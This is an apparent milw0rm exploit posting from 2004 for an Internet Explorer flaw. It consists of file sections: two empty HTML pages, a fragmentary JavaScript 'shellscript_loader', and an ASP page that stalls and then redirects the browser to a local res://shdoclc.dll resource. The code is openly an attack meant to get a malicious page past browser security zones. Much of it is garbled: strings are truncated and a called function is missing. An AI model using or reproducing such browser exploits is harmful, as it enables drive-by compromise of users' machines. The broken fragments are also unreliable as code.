----------------------------------------------------- default.htm ------------------------------------------------------- --------------------------------------------------------- md.htm --------------------------------------------------------- --------------------------------------------------- shellscript_loader.js --------------------------------------------------- function getRealShell() { myiframe.document.write("'); } document.write(''); setTimeout("injectIt()", 1000); --------------------------------------------------------- redir.asp ---------------------------------------------------------- <% Response.Expires = 1 Response.Expiresabsolute = Now() - 1 Response.AddHeader "pragma","no-cache" Response.AddHeader "cache-control","private" Response.CacheControl = "no-cache" For x = 1 to 500000 'Time z = z + 10 Next Response.Status = "302 Found" Response.AddHeader "Content-Length", "4" Response.AddHeader "Location","URL:res://shdoclc.dll/HTTP_501.htm" %> # milw0rm.com [2004-07-13]